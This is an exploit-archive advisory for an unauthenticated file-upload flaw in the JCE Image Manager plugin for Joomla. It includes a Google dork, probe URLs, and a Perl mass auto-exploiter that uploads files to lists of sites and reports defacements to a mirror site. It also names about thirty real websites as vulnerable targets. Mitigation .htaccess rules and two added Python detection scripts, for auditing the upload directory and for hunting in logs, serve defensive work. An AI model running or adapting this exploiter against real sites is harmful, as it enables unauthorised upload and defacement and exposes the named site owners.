#################################################################################
# Exploit Title : Joomla Content Editor JCE com_jce Components Image Manager Plugin 2.6.33 Remote File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Vulnerability Published Date : 30/11/2018
# Vulnerability First Discovered Date : 10/03/2014
# Vendor Homepage : joomlacontenteditor.net
# Software Download Links :
#   joomlacontenteditor.net/downloads/
#   extensions.joomla.org/extension/jce/
#   joomlacontenteditor.net/downloads/editor/core
#   joomlacontenteditor.net/downloads/editor/core/9
#   JCE 2.6.33 => joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=1353&element=f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=9ee3309d5768681d0360490d647c2266
#   JCE 2.6.7.1 => joomlacontenteditor.net/downloads/editor/core?task=callelement&format=raw&item_id=1255&element=f85c494b-2b32-4109-b8c1-083cca2b7db6&method=download&args[0]=547c7217f6fad641a91db0b982dd72b6
# Version Information : From JCE 2.6.7.1 to JCE 2.6.33 All Versions are affected.
#   Installation package for Joomla! 2.5 & 3.x - Previous Versions before 2.x are not affected.
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Google Dorks => inurl:''/index.php?option=com_jce''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
##############################################################################################
++++++++++++ Extended Exploit and Vulnerability Information Reference Links +++++++++++++
# CxSecurity Exploit Link : cxsecurity.com/ascii/WLB-2018050200
# Exploit4Arab Exploit Link : exploit4arab.org/exploits/2118
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=29762
# SecurityNewsWire Exploit Link : securitynewswire.com/latestsecuritynews/mobile_article.php?title=Joomla_Content_Editor_JCE_ImageManager_Vulnerability_Mass_Auto_Exploiter
# Reddit Exploit Link : reddit.com/r/phpAdvisories/comments/8lzi1t/joomla_content_editor_jce_imagemanager/
# HackerTor Exploit Link : hackertor.com/2018/05/24/joomla-content-editor-jce-imagemanager-vulnerability-mass-auto-exploiter/
# PhpSecure Exploit Link : phpsecure.info/go/163420.html
# Cyberizm Exploit Link : cyberizm.org/cyberizm-joomla-content-editor-jce-auto-mass-exploiter.html
##############################################################################################
Original Exploit Title : Joomla Content Editor JCE Image Manager Plugin 2.6.33 Remote File Upload Vulnerability and Mass Auto Exploiter Perl
##############################################################################################
# Description of the Product =>
JCE makes creating and editing Joomla!® content easy... Add a set of tools to your Joomla!® environment that gives you the power to create the kind of content you want, without limitations, and without needing to know or learn HTML, XHTML, CSS...
Office-like functions and familiar buttons make formatting simple
Upload, rename, delete, cut/copy/paste images and insert them into your articles using an intuitive and familiar interface
Create Links to Categories, Articles, Weblinks and Contacts in your site using a unique and practical Link Browser
Easily tab between WYSIWYG, Code and Preview modes. Create Tables, edit Styles, format text and more...
Integrated Spellchecking using your browser's Spellchecker
Fine-grained control over the editor layout and features with Editor Profiles
Media Manager =>
Upload and insert a range of common media files including Adobe® Flash®, Apple Quicktime®, Windows Media Player® and HTML 5 Video and Audio.
Easily insert Youtube and Vimeo videos - just paste in the URL and Insert!
Insert HTML5 Video and Audio with multiple source options
Image Manager Extended =>
Create a thumbnail of any part of an image with the Thumbnail Editor
Insert multiple images. Create responsive images with the srcset attribute
Create image popups in a few clicks - requires JCE MediaBox or compatible Popup Extension
Filemanager =>
Create links to images, documents, media and other common file types
Include a file type icon, file size and modified date
Insert as a link or embed the document with an iframe
Create downloadable files using the download attribute.
Template Manager =>
Insert pre-defined template content from html or text files
Create template snippet files from whole articles or selected content
Configure the Template Manager to set the startup content of new articles
##############################################################################################
Outdated versions of the Joomla extension JCE contain a very serious security vulnerability that allows an attacker to upload files remotely to a website. You can search all plugins and themes to find more sites. Most of them have this plugin JCE installed. [ 40% or more ] Use your brain.
Explanation for Joomla Content Editor JCE => [ ScreenShot from Administrator Control Panel ] => cdn.pbrd.co/images/Hmx6KZC.jpg ~ cdn.pbrd.co/images/HmypA0v.png
Note : This Joomla JCE issue is not the previous exploit that wrote to this path => ..../images/stories/......php => NO
Previous Version Exploit Link => bugreport.ir/78/exploit.htm => This doesn't work for this vulnerability.
Notes => Joomla Content Editor JCE Toggle Editor / Image Manager behind the Administration Panel [ ScreenShot ] => https://cdn.pbrd.co/images/Hmx6KZC.jpg
This exploit needs no authentication : no username or password is required and the admin panel is not involved. There is a little trick here.
TARGETSITE/yourfilename.png .gif .jpg or TARGETSITE/images/yourfilename.html => YES
.php .asp .jpg .gif .png =>
##############################################################################################
Install JCE Editor in Joomla! 2.5 Tutorial [video=youtube]https://www.youtube.com/watch?v=oQdyi_xKJBk[/video]
Joomla 3 Tutorial #7: Using the Joomla Content Editor (JCE) Tutorial [video=youtube]https://www.youtube.com/watch?v=fI0_S-T1gK8[/video]
How to Update / Upgrade a Joomla! Page that uses JCE: the Joomla Content Editor. Fix the Bugs for this Vulnerability [video=youtube]https://www.youtube.com/watch?v=X6h5kcAxvu0[/video]
##############################################################################################
Solution for this Security Issue =>
Add an .htaccess file in /images/ and in the /public_html/ homepage folder that disallows any scripts from being run. Put this in your .htaccess file:

AddHandler cgi-script .php .php3 .php4 .phtml .pl .py .jsp .asp .htm .shtml .sh .cgi .exe .png .jpg .gif .txt .html .htm
Options -ExecCGI

This makes it so scripts with those extensions are not allowed to run, and Apache will return a FORBIDDEN (403) error if they are requested. Note that because .png, .jpg and .gif are in the list, the same rule also stops legitimate images in that directory from being served, so it only fits a directory that should serve nothing at all.
Another thing to consider in the .htaccess is something like this:

RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(.+\.)?yourwebsite.com/.*$ [NC]
RewriteRule \.(gif|jpg|png)$ - [F]

The above will not allow anyone to view the images unless they are viewing them as content on "yourwebsite.com". This stops people from hotlinking your images. It is hotlink protection only: it does not block the upload itself, and a client that sends no Referer header at all passes the first RewriteCond and is still served.
Or you can try this =>
1. Add the following .htaccess as ./images/.htaccess to prevent a PHP shell from running:
#####################
Options -Indexes
php_flag engine 0
RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml .gif .png .jpg .txt
AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml .gif .png .jpg .txt
#####################
(php_flag is only understood when PHP runs as the Apache module mod_php; with PHP-FPM or CGI it is an unknown directive and produces a 500 error, so there the engine has to be disabled in the pool or server configuration instead.)
2. Deny access to the /tmp folder by adding ./tmp/.htaccess with the following content:
#####################
deny from all
#####################
##############################################################################################
You can check whether a site is vulnerable by requesting the URLs below in your browser; a vulnerable installation answers with the JSON error messages shown. For Exploiting the Sites - use the Auto Mass Exploiter Perl script.
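The .htaccess rules above stop an uploaded file from executing, but they do nothing about files that were already dropped before the rules went in. As an added defender-side example (not part of this advisory and not JCE's or the author's code), the following Python script audits an upload directory such as Joomla's images/ for the artefact this flaw leaves behind: a file whose bytes do not match its extension (markup or PHP stored as .png/.gif/.jpg), a polyglot that starts with a valid image header and carries a script marker, or a script or markup file sitting in a directory that should hold only images. The directory path, the magic-byte table, the marker regex and the sample tree built by demo() are all assumptions constructed for this example.

```python
"""Audit an image upload directory for files that are not what their extension claims.
Added example; not part of the advisory and not JCE code. Sample files are constructed."""
import os
import re
import shutil
import sys
import tempfile

# Leading bytes of the image formats the Image Manager is meant to accept (assumed table).
IMAGE_MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
}
# Extensions that have no business in an image directory (the advisory lists .html/.txt/.php uploads).
SCRIPT_EXTS = (".php", ".phtml", ".php3", ".php4", ".php5", ".asp", ".aspx", ".jsp",
               ".cgi", ".pl", ".py", ".sh", ".html", ".htm", ".shtml", ".txt")
# Cheap heuristic for server-side code hidden after a genuine image header (polyglot).
SCRIPT_MARKERS = re.compile(rb"<\?php|<\?=|<script|<%", re.IGNORECASE)
# Joomla ships index.html placeholders in media folders; .htaccess is the mitigation itself.
ALLOWLIST = {".htaccess", "index.html"}


def classify(name, data):
    """Return a finding label for one file, or None if it looks like what it claims to be."""
    ext = os.path.splitext(name)[1].lower()
    if ext in IMAGE_MAGIC:
        if not data.startswith(IMAGE_MAGIC[ext]):       # bytes.startswith accepts a tuple
            return "extension/content mismatch"
        if SCRIPT_MARKERS.search(data):
            return "script marker inside image body"
        return None
    if ext in SCRIPT_EXTS:
        return "script or markup file in image directory"
    return "unexpected extension"


def audit_directory(root):
    """Walk root and return sorted (relative path, finding) pairs for suspicious files."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fname in files:
            if fname in ALLOWLIST:
                continue
            path = os.path.join(dirpath, fname)
            with open(path, "rb") as fh:
                data = fh.read()
            verdict = classify(fname, data)
            if verdict:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, verdict))
    return sorted(findings)


def demo():
    """Build a constructed sample tree in a temp dir, audit it, and return the findings."""
    root = tempfile.mkdtemp(prefix="jce-audit-")
    try:
        samples = {
            "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,                  # genuine PNG
            "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,                 # genuine JPEG
            "kingskrupellos.png": b"<html><body>test page</body></html>",   # markup saved as .png
            "banner.gif": b"GIF89a<?php /* constructed marker */ ?>",        # GIF/PHP polyglot
            "notes.txt": b"plain text",                                      # not an image
            "stories/x.php": b"<?php /* constructed */ ?>",                  # script in subfolder
            ".htaccess": b"Options -ExecCGI\n",                              # allowlisted
        }
        for rel, content in samples.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(content)
        return audit_directory(root)
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    for rel, verdict in (audit_directory(target) if target else demo()):
        print(f"{verdict:45} {rel}")
```

Run it as `python audit_images.py /path/to/joomla/images`; with no argument it audits the constructed sample tree instead. The marker regex is deliberately simple: it catches the obvious PHP/HTML payloads this flaw is used to drop, and anything it reports should be confirmed by hand rather than deleted blindly, while a file that uses obfuscation will need a real scanner.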
Exploit => /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20
{"result":{"error":true,"result":""},"error":null}
Exploit => /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload
{"result":null,"error":"No function call specified!"}
Exploit => /component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/
{"result":null,"error":"No function call specified!"}
Directory File Path => TARGETSITE/yourfilename.png or TARGETSITE/images/yourfilename.png
##############################################################################################
Joomla JCE Image Manager Auto Mass Exploiter Perl =>

#!/usr/bin/perl
use Term::ANSIColor;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Request::Common qw(POST);
$ua = LWP::UserAgent->new(keep_alive => 1);
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");
$ua->timeout (10);
system('title Joomla JCE All Versions Mass Auto Exploiter Perl by KingSkrupellos');
print "JCE Mass Auto Exploiter\n";
print "Coded by KingSkrupellos\n";
print "Cyberizm Digital Security Team\n";
print "Please Give WebSites List Here:";
my $list=<STDIN>;
chomp($list);
open (THETARGET, "<$list") || die ">>>WebSite cannot be open. Wrong URL Link<<< !";
@TARGETS = <THETARGET>;
close THETARGET;
$link=$#TARGETS + 1;
foreach $site(@TARGETS){
    chomp $site;
    if($site !~ /http:\/\//) { $site = "http://$site/"; };
    $exploiturl="/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20";
    print "wait upload $site\n";
    $vulnurl=$site.$exploiturl;
    $res = $ua->get($vulnurl)->content;
    if ($res =~ m/No function call specified!/i){
        open(save, '>>C:\Users\YOURNAMEHERE\KingSkrupellos\result\list.txt');
        print "\n[Uploading]";
        my $res = $ua->post($vulnurl,
            Content_Type => 'form-data',
            Content => [
                'upload-dir' => './../../',
                'upload-overwrite' => 0,
                'Filedata' => ["kingskrupellos.png"],
                'action' => 'upload'
            ]
        )->decoded_content;
        if ($res =~ m/"error":false/i){
        }else{
            print " ......... ";
            print color('bold white'); print "["; print color('reset');
            print color('bold green'); print "PATCHED"; print color('reset');
            print color('bold white'); print "] \n"; print color('reset');
        }
        $remote = IO::Socket::INET->new( Proto=> PeerAddr=>"$site", PeerPort=> Timeout=> );
        $def= "$site/kingskrupellos.png";
        print colored ("[+]Successfully Exploited",'white on_red'),"\n";
        print "$site/kingskrupellos.png\n";
    }else{
        print colored (">>Exploit Don't Work. Wrong URL Link. Not Vulnerable.<<",'white on_blue'),"\n";
    }
}
sub zonpost{
    $req = HTTP::Request->new(GET=>$link);
    $useragent = LWP::UserAgent->new();
    $response = $useragent->request($req);
    $ar = $response->content;
    if ($ar =~ /Hacked By KingSkrupellos/){
        $dmn= $link;
        $def="KingSkrupellos";
        $zn="http://aljyyosh.org/single.php";
        $lwp=LWP::UserAgent->new;
        $res=$lwp -> post($zn,[
            'defacer' => $def,
            'domain1' => $dmn,
            'hackmode' => '15',
            'reason' => '1',
            'GAPnder' => 'Send',
        ]);
        if ($res->content =~ /color="red">(.*)<\/font><\/li>/) {
            print colored ("[-]Send WebSites to Mirror $1",'white on_green'),"\n";
        } else {
            print colored ("[-]Error Has Occured",'black on_white'),"\n";
        }
    }else{
        print" Zone Could'nt be Taken From Aljyyosh!! \n";
    }
}

##############################################################################################
# Usage Explained =>
Download XAMPP for your Operating System => apachefriends.org/download.html
XAMPP for Windows 5.6.38, 7.0.32, 7.1.24 & 7.2.12
XAMPP for Linux 5.6.38, 7.0.32, 7.1.24 & 7.2.12
XAMPP for OS X 5.6.38, 7.0.32, 7.1.24, 7.2.12, XAMPP-VM & XAMPP-VM
How to use this Perl code on your operating system, for example Windows [ you can also run it on Linux ] :
Open Start + Go to Search Button + Type "Command Prompt" => or cmd.exe
Or you can use ConEmu for Windows => conemu.github.io => Download it and use it.
Create a folder like " jcee " on your Desktop and put your jceexploit.pl and yourimagefile.png, .gif, .png, .html or .txt in it
C:/Users/Your-Computer-Name/
cd Desktop
cd "jcee"
perl yourexploitcodenamejce.pl site.txt
Waiting for Upload Exploit Successful or Not Finished
##############################################################################################
Example Vulnerable Sites => [ More on Search Engines like Google - Yahoo - Bing and others etc.. - Use your Brain...
] abcdance.ro/component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ {"result":{"error":true,"result":""},"error":null} sv-pfaffenhofen.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} http://www.mocollc.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} sisdesign.com.br/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} horizonclimatecontrols.ca/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} living-anatomy.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} vera-karelli.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} noatrans.fr/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} vietthiphotography.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} franciscoqueiroz.com.br/portal/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} dessupoiu.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} restoran-tamada.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload 
{"result":{"error":true,"result":""},"error":null} elsonllc.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} aidem.in/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} ruralsouthtexasedc.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} parbutaranfurniture.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} anhadesigns.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} heartofasportsman.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} sv-langwedel.de/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} laboratoriodellarte.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} wagadu-jikke.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} lasolida.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} premiorenatofucini.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} poliambulatoriolattanzi.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload 
{"result":{"error":true,"result":""},"error":null} specialitainvetrina.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} comune.scalea.cs.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} cavambrosiano.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} fratellidisoledad.it/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} vitaminasport.bg/?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} personnalisationcarte.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} taxi3305050.ru/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} studioconsulenzasportiva.com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} misericordiamontalto.org/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&action=upload {"result":{"error":true,"result":""},"error":null} THE END ############################################################################################## Author is not responsible for any damage of the websites. This Article has been written with the purpose of education. 
############################################################################################## Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ##############################################################################################
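The probe URLs and the exploiter's request pattern listed above are exactly what a defender can look for in web server logs: a GET against the Image Manager form endpoint that is answered with one of the JSON errors, a POST to the same endpoint (the multipart body is not logged, so any POST there counts), and a follow-up GET from the same source for the file it just dropped. As an added defender-side example (not part of this advisory and not JCE code), the following Python script runs that detection over Apache combined-format access log lines. The log lines in SAMPLE_LOG are constructed for this example and use documentation-range IP addresses; the fourth line reuses the User-Agent string from the advisory's Perl script. The log regex, the label names and the follow-up-fetch heuristic are assumptions of this example.

```python
"""Hunt for JCE Image Manager probe and upload traffic in Apache combined access logs.
Added example; not part of the advisory and not JCE code. SAMPLE_LOG is constructed."""
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log format; referer and user agent are optional (assumed format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)
# Extensions the advisory says the flaw lets through; a later GET of such a file
# by a source that already POSTed to the upload endpoint is worth a look.
UPLOAD_EXTS = (".png", ".gif", ".jpg", ".html", ".htm", ".txt", ".php")

# Constructed sample log, not real traffic. Line 1 is the probe, line 2 the upload POST,
# line 3 the fetch of the dropped file, lines 4-5 are benign, line 6 is the SEF-style probe.
SAMPLE_LOG = """\
203.0.113.10 - - [30/Nov/2018:10:01:02 +0000] "GET /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.1" 200 48 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"
203.0.113.10 - - [30/Nov/2018:10:01:03 +0000] "POST /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 HTTP/1.1" 200 51 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"
203.0.113.10 - - [30/Nov/2018:10:01:04 +0000] "GET /kingskrupellos.png HTTP/1.1" 200 3210 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)"
192.0.2.44 - - [30/Nov/2018:10:02:10 +0000] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
192.0.2.44 - - [30/Nov/2018:10:02:11 +0000] "GET /images/logo.png HTTP/1.1" 200 4096 "http://example.test/" "Mozilla/5.0"
198.51.100.7 - - [30/Nov/2018:10:05:00 +0000] "GET /component/option,com_jce/action,upload/file,imgmanager/lang,en/method,form/plugin,imgmanager/task,plugin/ HTTP/1.1" 200 50 "-" "curl/7.61.0"
"""


def jce_params(path):
    """Return the request parameters of a JCE Image Manager request, else None.
    Handles the query-string form (index.php?option=com_jce&...) and the SEF form
    (/component/option,com_jce/action,upload/...), whose segments are key,value pairs."""
    parts = urlsplit(path)
    qs = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if "option" not in qs:
        for seg in parts.path.split("/"):
            if "," in seg:
                k, _, v = seg.partition(",")
                qs.setdefault(k, v)
    if qs.get("option") != "com_jce" or qs.get("plugin") != "imgmanager":
        return None
    return qs


def classify_request(rec):
    """Label one parsed log record, or return None if it is not Image Manager traffic."""
    qs = jce_params(rec["path"])
    if qs is None:
        return None
    if rec["method"] == "POST":
        return "upload-attempt"            # body not logged; a POST here is the upload itself
    if qs.get("method") == "form" or qs.get("action") == "upload":
        return "probe"                     # the GET that elicits the JSON error responses
    return "other-imgmanager"


def scan_log(lines):
    """Parse log lines and return the suspicious records in log order."""
    findings, uploaders = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        kind = classify_request(rec)
        if kind == "upload-attempt":
            uploaders.add(rec["ip"])
        # A source that POSTed to the endpoint and then fetches a file of an uploadable
        # type is checking that its upload landed.
        if (kind is None and rec["ip"] in uploaders and rec["method"] == "GET"
                and urlsplit(rec["path"]).path.lower().endswith(UPLOAD_EXTS)):
            kind = "follow-up-fetch"
        if kind:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "kind": kind,
                             "status": rec["status"], "path": rec["path"]})
    return findings


def summarize(findings):
    """Count findings per (source IP, kind) so the noisiest sources surface first."""
    return dict(Counter((f["ip"], f["kind"]) for f in findings))


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG.splitlines())
    for h in hits:
        print(f'{h["ts"]}  {h["ip"]:15} {h["kind"]:16} {h["status"]} {h["path"]}')
    print(summarize(hits))
```

Point scan_log at a real access_log (for example `scan_log(open("/var/log/apache2/access.log"))`) and every probe, upload POST and follow-up fetch against the Image Manager endpoint is listed with its source; an "upload-attempt" followed by a 200 on a "follow-up-fetch" is the pair that should trigger the directory audit, because the HTTP status of the POST alone does not tell you whether the upload succeeded.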